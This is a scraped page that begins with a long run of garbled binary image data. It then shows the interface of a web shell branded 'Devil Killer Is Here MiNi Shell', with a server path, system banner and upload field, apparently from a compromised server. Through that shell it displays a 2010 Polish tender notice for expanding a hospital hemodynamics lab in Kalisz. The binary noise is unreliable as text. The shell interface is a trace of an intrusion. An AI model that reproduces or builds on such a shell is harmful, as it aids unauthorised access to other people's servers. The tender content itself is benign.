JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100803/207681-N-2010.html

<p class="kh_header"><b>Kalisz: Rozbudowa Pracowni Hemodynamiki
w Wojewódzkim Szpitalu Zespolonym im. Ludwika Perzyny w Kaliszu</b><br>
<b>Numer ogłoszenia: 207681 - 2010; data zamieszczenia: 03.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. Ludwika Perzyny w Kaliszu , ul. Poznańska 79, 62-800 Kalisz, woj. wielkopolskie, tel. 062 7651397, faks 062 7571323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalkalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa Pracowni Hemodynamiki
w Wojewódzkim Szpitalu Zespolonym im. Ludwika Perzyny w Kaliszu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rozbudowa Pracowni Hemodynamiki o dodatkową Pracownię Angiograficzną w Wojewódzkim Szpitalu Zespolonym im. Ludwika Perzyny w Kaliszu.
Zakres rzeczowy prac obejmuje:
- roboty budowlane, w tym montaż zabezpieczeń antyradiacyjnych,
- montaż instalacji: wodno-kanalizacyjnej, centralnego ogrzewania, wentylacji mechanicznej, elektrycznej, przeciwpożarowej,
oraz montaż sieci/systemów: komputerowej, telefonicznej, monitoringu.

Zakres i kolejność robót przygotowawczych i rozbiórkowych:
Zakres robót obejmuje następujące roboty przygotowawcze i rozbiórkowe:
- przebudowę WC,
- wydzielenie i zabezpieczenie przed pyleniem pomieszczeń czynnej  części Pracowni Hemodynamiki,
- demontaż wyposażenia sanitarnego, rozbiórka części ścianek murowanych, posadzek z warstwami, sufitów podwieszonych, obudowy szachtów instalacyjnych i wszystkich instalacji,
- przebudowę pomieszczeń i dostosowanie ich do wymagań montażowych angiografu,
- remont przestrzeni pod stropem pod montaż kanałów wentylacyjno - klimatyzacyjnych,
- przebudowę instalacji wodno-kanalizacyjnej, centralnego ogrzewania, istniejącej wentylacji mechanicznej, elektrycznych, teletechnicznych i gazów medycznych,
- wykonanie robót wykończeniowych: wymiana stolarki drzwiowej, posadzek, ścianek, sufitów podwieszanych,
- wykonanie zabezpieczeń antyradiacyjnych podłóg i ścian Gabinetu Zabiegowego z montażem specjalnych drzwi i okien antyradiacyjnych,
- roboty porządkowe,
- montaż aparatury i wyposażenia, wykonanie niezbędnych pomiarów i testów,
- zgłoszenie pracowni do odbioru i użytkowania.

I.   Prace budowlane:
a) Projektuje się rozbiórkę wszystkich posadzek i części ścianek działowych, demontaż armatury sanitarnej i wszystkich instalacji. Przewiduje się także rozbiórkę obudowy szachtów instalacyjnych z usunięciem zbędnych i wymianie uszkodzonych instalacji. Roboty rozbiórkowe zostały szczegółowo opracowane na rys. 12.
b) Projektuje się w miejsce części ścian murowanych - lekkie ścianki systemowe GK dwóch typów: 
x ścianki wzmocnione - grubości 15 cm (10 cm stelaż stalowy systemowy i 2 x po 1,25cm płyty gipsowo-kartonowe, wewnątrz ścianki izolacja 10 cm wełny mineralnej i folia systemowa), 
x ścianki zwykłe - grubości 10 cm (stelaż stalowy systemowy 7,5cm, 2 x 1,25 cm płyta GK, wewnątrz ścianki izolacja z wełny mineralnej o grubości 7,5 cm i folia). 
Ponadto projektowane są uzupełnienia i wypełnienia ścian z cegły dziurawki grubości 12 cm, 6 cm oraz betonu komórkowego 12 cm. 
Ścianki szachtów odtwarza się jako murowane z cegły pełnej ceramicznej gr. 6,5 i 12 cm z dozbrajaniem prętami śr.6 mm co trzecią spoinę.
c) Z uwagi na zły stan techniczny istniejących posadzek projektuje się usunięcie warstw podłogowych do lica stropu konstrukcyjnego oraz wykonanie nowych posadzek: 
x w pomieszczeniu angiografu:
- wykładzina rulon PCV antyelektrostatyczny typu tarket z taśmą miedzianą klejoną na podkładzie samopoziomującym,
- wylewka betonowa o grubości 4 cm, zbrojona siatką z prętów o grubości = 4,5 mm i oczkach 12 x 12 cm,
- folia PE 0,2 mm,
- styropian EPST 4 cm,
- ekran antyradiacyjny - blacha ołowiowa gr. 0,15 cm,
- wylewka samopoziomująca 1cm,
- strop typu Akermana 25cm;

x w pomieszczeniach nr 9, 10 i 12, 13:
- wykładzina rulon PCV antyelektrostatyczny typu tarket (np. TORO EL) z taśmą miedzianą klejona na podkładzie samopoziomującym,
- wylewka betonowa o grubości 4cm, zbrojona siatką z prętów o grubości = 4,5 mm i oczkach 12 x 12 cm,
- folia PE 0, 2mm,
- styropian EPST 4 cm,
- strop typu Akermana 25cm.

x w pozostałych pomieszczeniach suchych:
- wykładzina rulon PCV elektrostatyczny typu tarket (np. SOMPLAN PLUS) , klejony na podkładzie samopoziomującym,
- wylewka betonowa o grubości 4 cm, zbrojona siatką z prętów o grubości = 4,5 mm i oczkach 12 x 12 cm,
-folia PE 0,2 mm,
-styropian EPST 4 cm
- strop typu Akermana 25cm.

x w  pomieszczeniach mokrych:
          -    terakota,
          - 	   izolacja płynna,
          - 	   wylewka betonowa zbrojona jw. siatką stalową z prętów średnica 4,5
                mm,
          -    styropian 4 cm,
          -    folia izolacyjna PCV, lub PE wywinięta na ściany,
          -   strop istniejący.
Styki ścian z posadzkami w pomieszczeniach mokrych należy zabezpieczyć specjalnymi taśmami systemowymi, a ściany zagruntować i izolować płynną folią.
d) Tynki wewnętrzne, okładziny oraz powłoki malarskie. 
Na ściany i sufity istniejące, po uprzednim oczyszczeniu należy nałożyć gładź gipsową. Ścianki nowoprojektowane z cegły dziurawki lub bloczków z betonu komórkowego wykończyć tynkiem tradycyjnym. Na sufity i ściany projektuje się powłoki malarskie z farb posiadających atesty do stosowania na obiektach służby zdrowia o odpowiednich parametrach zmywalności i ścieralności.

Zabezpieczenia antyradiacyjne:
Na podstawie obliczeń i zatwierdzonych przez Wojewódzką Stację Sanepidu zaprojektowano osłony stałe antyradiacyjne w pomieszczeniu angiografu. 
- posadzki zabezpieczone blachą ołowianą gr. 1,5 mm, układaną na  klej na wyrównanej warstwie stropu konstrukcyjnego z odpowiednimi zakładami i wywinięciami na ścianę,
- ściany i drzwi zaprojektowano z paneli systemowych antyradiacyjnych, z wkładką z blachy ołowianej, o grubości od 1 -  2 mm według rysunku nr 7. Drzwi z  pomieszczenia nr 11 do pomieszczenia nr 12 otwierane automatycznie,
- okna ochronne ze szkła ołowiowego o równoważniku ołowiu 2 mm i 1,5 mm montowane są systemowo w ścianach w ościeżnicach drewnianych,
- sufit posiada zabezpieczenie antyradiacyjne starego typu - tynkiem barytowym grubości 1cm i z uwagi na znajdującą się nad pomieszczeniami gabinetu pustkę wentylacyjną poddasza, sufit nie wymaga dodatkowych zabezpieczeń antyradiacyjnych,
- podczas przebudowy otoczenia Pracowni Hemodynamiki zostaną zdemontowane antyradiacyjne drzwi do pomieszczenia nr 7. Otwór należy zasklepić panelem antyradiacyjnym 2 mm Pb na całą wysokość pomieszczenia i szerokość 1,0 m.

II. Instalacje według projektów branżowych:
W związku z przebudową istniejących pomieszczeń oraz zmianą wymagań technologicznych i sanitarnych należy wymienić wszystkie instalacje:
1) Wentylacja grawitacyjna -  do  likwidacji.
2) Instalacja wentylacji mechanicznej wyciągowej projektowana jest w pomieszczeniach sanitarnych, działa jako mechaniczna, zblokowana, z włącznikiem światła (z opóźnieniem włączenia i wyłączenia). Po wyłączeniu działa jako wentylacja mechaniczna, ciągła. 
3) Instalacja wentylacji nawiewno - wywiewnej z indywidualnym klimatyzatorem zaprojektowano w pomieszczeniach nr 12, 13 { w-n = 3w-h }.
4) W pomieszczeniu technicznym zaprojektowano wentylację mechaniczną wyciągową z klimatyzatorem schładzającym powietrze.
5) Wentylację nawiewno - wywiewną z klimatyzacją zaprojektowano:
a)  w pomieszczeniu nr 11 (Gabinetu zabiegowego) krotności wymian powietrza na poziomie nawiew/ wywiew  = 10 na 11 w-h ( z uwzględnieniem uzysku ciepła od aparatury), 
b) w pomieszczeniach nr 8, 9, 10 n-w = 5 na 4 w-h,
c) w pomieszczeniach z gazami medycznymi (8, 10, 11) - nawiew powietrza do pomieszczenia górą, wywiew powietrza z pomieszczenia w układzie dwupoziomowym 20% powietrza górą i 80% powietrza dołem przy posadzce. 
Układ wentylacyjny projektuje się wykonać w oparciu o centralę wentylacyjną nawiewno - wywiewną grzewczo-chłodzącą, współpracującą z układem kanałów wentylacyjnych uzbrojonych w kraty wentylacyjne. 
Centrala wentylacyjna wyposażona będzie w pełną automatykę sterującą i zasilane czynnikiem grzewczym - wodą grzejną z miejskiej sieci ciepłowniczej, oraz alternatywnie z własnej kotłowni opalanej gazem, z możliwością przełączania układu. 
Czynnik chłodniczy za pomocą agregatu chłodniczego pracującego w oparciu o gaz R407.
6) Instalacje grzewcze - projektuje się wymianę istniejących grzejników żeliwnych żebrowych na grzejniki płytowe gładkie, higieniczne zamontowane w odległości 10 cm od ściany i posadzki w sposób umożliwiający ich łatwe mycie i dezynfekcję.
7) Instalacje wodno - kanalizacyjne: projektuje się wykorzystanie istniejących pionów zlokalizowanych w szachtach instalacyjnych. Do umywalek, zlewów i zlewozmywaków podłączona będzie ciepła i zimna woda z baterii naściennych. W pomieszczeniu przygotowania lekarzy oraz na stanowisku obserwacyjnym 
i pomieszczeniu gospodarczym zamontowane będą baterie bezdotykowe lekarskie. Dodatkowe wyposażenie stanowić będą mydło i środek dezynfekcyjny w płynie oraz ręczniki jednorazowe. W  pozostałych pomieszczeniach, gdzie występują umywalki należy umieścić mydło w płynie i ręczniki jednorazowe. 
8) Instalacje gazów medycznych należy włączyć do istniejącego pionu Nr 6 sieci szpitalnej. Projektuje się  doprowadzenie instalacji gazów medycznych do pomieszczenia zabiegowego angiografu oraz do stanowiska obserwacyjnego i przygotowania pacjenta (pomieszczenia nr 8, 10, 11). W sali zabiegowej należy zamontować kolumnę anestezjologiczną z gazami medycznymi: (sześć punktów poboru gazów medycznych, jeden odciąg gazów poanestazjologicznych, sześć gniazd 230V i sześć zacisków ekwipotencjalnych).
9) Instalacje elektryczne - zasilanie nowego aparatu angiografu będzie wymagać: 
a) rozbudowy istniejącej rozdzielni w szachcie 3 na 11 w budynku 1B na niskim parterze i ułożenia nowego kabla zasilającego do rozdzielnicy systemowej TR dostarczanej wraz z aparatem,
b) drobne odbiorniki będą podłączone do istniejącej rozdzielnicy w szachcie 3 na 13 na pierwszym piętrze budynku 1B. 
Pozostałe instalacje elektryczne i sygnalizacyjne w pomieszczeniach kardioangiografu, sterowni i technicznym ( nr 11, 13, 14 ) do wymiany zgodnie z wytycznymi dostawcy aparatury. 
Gniazda elektryczne w pomieszczeniach 8, 9, 10, 11, gdzie występują gazy medyczne (podtlenek azotu) muszą być montowane na wysokości 1,6 m od poz. posadzki. 
W pozostałych pomieszczeniach wymiana instalacji elektrycznych zgodnie z projektem branży elektrycznej.

W pracowni projektuje się instalacje :
- telefoniczną z bezpośrednim numerem zewnętrznym ze sterowni,
- komputerową z połączeniem do internetu oraz z siecią szpitala,
- monitoringu z kamerami w pomiesczeniach nr 8, 9, 10.

Dodatkowo projektuje się podłączenie pomieszczeń 2, 8 i 13 do wewnętrznej sieci komputerowej i telefonicznej szpitala.

Ochrona przeciwpożarowa:
Pracownia kardioangiograficzna stanowi część większej strefy pożarowej budynku. Jest to budynek wysoki (wys. > 12m ), o 10 kondygnacjach.
Obiekt zalicza się do kategorii ZL II. Klasa odporności pożarowej budynku B:
- główna konstrukcja nośna R120, ściany zewnętrzne EI 60, ściany wewnętrzne EI 30, stropy REI 60, 
- należy projektowane belki stalowe stropu i belki zabezpieczyć p.poż. przez osiatkowanie i obetonowanie (otynkowanie),
- układ dróg pożarowych, hydrantów zewnętrznych i wewnętrznych oraz instalacji p.poż. szpitala pozostaje bez zmian,
- pracownia będzie wyposażona w gaśnice o masie środka gaśniczego 2 kg na każde 100 m2 powierzchni strefy pożarowej.

Szczegółowy zakres robót został zawarty w następujących załącznikach 
do Specyfikacji Istotnych Warunków Zamówienia, stanowiących integralną jej część:
1. SPECYFIKACJE TECHNICZNE: 
Załącznik nr 1  -  branży budowlanej, 
Załącznik nr 2  -  branży elektrycznej,
Załącznik nr 3  -   branży sanitarnej (centralne ogrzewanie),
Załącznik nr 4  -   branży sanitarnej (inst. gazów medycznych)
Załącznik nr 5  -   branży sanitarnej (inst. wentylacyjna i kanalizacyjna)
Załącznik nr 6  -   branży sanitarnej (inst. wodna i kanalizacyjna).
2. PRZEDMIARY ROBÓT:
Załącznik nr 7  -   branży budowlanej, 
Załącznik nr 8  -   branży elektrycznej,
Załącznik nr 9  -   branży sanitarnej (centralne ogrzewanie),
Załącznik nr 10  - branży sanitarnej (inst. gazów medycznych),
Załącznik nr 11  - branży sanitarnej (inst. wentylacyjna i kanalizacyjna),
Załącznik nr 12  - branży sanitarnej (inst. wodna i kanalizacyjna).
3. PROJEKTY BUDOWLANO-WYKONAWCZE:
Załącznik nr 13  -  branży budowlanej, 
Załącznik nr 14  -  branży elektrycznej,
Załącznik nr 15  -  branży sanitarnej (centralne ogrzewanie),
Załącznik nr 16  -   branży sanitarnej (inst. gazów medycznych),
Załącznik nr 17  -   branży sanitarnej (inst. wentylacyjna i kanalizacyjna),
Załącznik nr 18  -   branży sanitarnej (inst. wodna i kanalizacyjna),
Załącznik nr 19  -   branży technologicznej.
Wyżej wymienione załączniki do SIWZ zostały zamieszczone w wersji elektronicznej na stronie internetowej Zamawiającego(www.szpital.kalisz.pl) oraz są dostępne w wersji papierowej w siedzibie Zamawiającego, po wcześniejszym uzgodnieniu terminu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 30 000,00 PLN (słownie: trzydzieści tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie należy dostarczyć wykaz wykonanych robót budowlanych, polegających na przebudowie lub remoncie obiektów ( co najmniej jedna robota budowlana ) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 
prowadzenia działalności jest krótszy - w tym okresie na kwotę nie niższą niż 300 000,00 PLN brutto każda (słownie: trzysta tysięcy złotych 00/100).Wykaz winien być sporządzony w układzie tabelarycznym. W pojedynczym wierszu tabeli należy 
wyszczególnić informacje na temat robót budowlanych zrealizowanych w jednym obiekcie. W kolumnach tabeli należy wyszczególnić następujące informacje:
      -  miejsce wykonania (obiekt),
      -  nazwa i adres podmiotu na zlecenie którego wykonywane były roboty,
      -  rodzaj wykonywanych robót,
-  data rozpoczęcia i zakończenia (data odbioru robót),
      -  wartość robót wyrażoną jako kwota brutto w złotych polskich.
Wykonawca do wykazu musi dołączyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (dokumentami takimi mogą być: referencje lub rekomendacje odbiorców robót lub protokoły odbiorów potwierdzające wykonanie robót zgodnie ze sztuką budowlaną).

 Ocena spełnienia wyżej wymieniomego warunku przez Wykonawców zostanie dokonana zgodnie z formułą spełnia / nie spełnia w oparciu o informacje zawarte w dokumencie, którego Zamawiający wymaga wyżej. Z treści załączonego dokumentu jednoznacznie musi wynikać, iż Wykonawca spełnia powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia należy przedstawić wykaz osób (minimum jedna osoba), które będą uczestniczyć w wykonywaniu zamówienia, legitymujących się kwalifikacjami zawodowymi (uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie), doświadczeniem  i wykształceniem odpowiednimi do powierzonej funkcji kierownika budowy. Wykaz winien zawierać następujące informacje: nazwisko i imię, posiadane kwalifikacje, doświadczenie i wykształcenie, zakres wykonywanych czynności, informacja o podstawie do dysponowania tymi osobami.

Ocena spełnienia wyżej wymieniomego warunku przez Wykonawców zostanie dokonana zgodnie z formułą spełnia / nie spełnia w oparciu o informacje zawarte w dokumencie, którego Zamawiający wymaga wyżej. Z treści załączonego dokumentu jednoznacznie musi wynikać, iż Wykonawca spełnia powyższy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kosztorys Ofertowy.
2. Zaakceptowany projekt umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
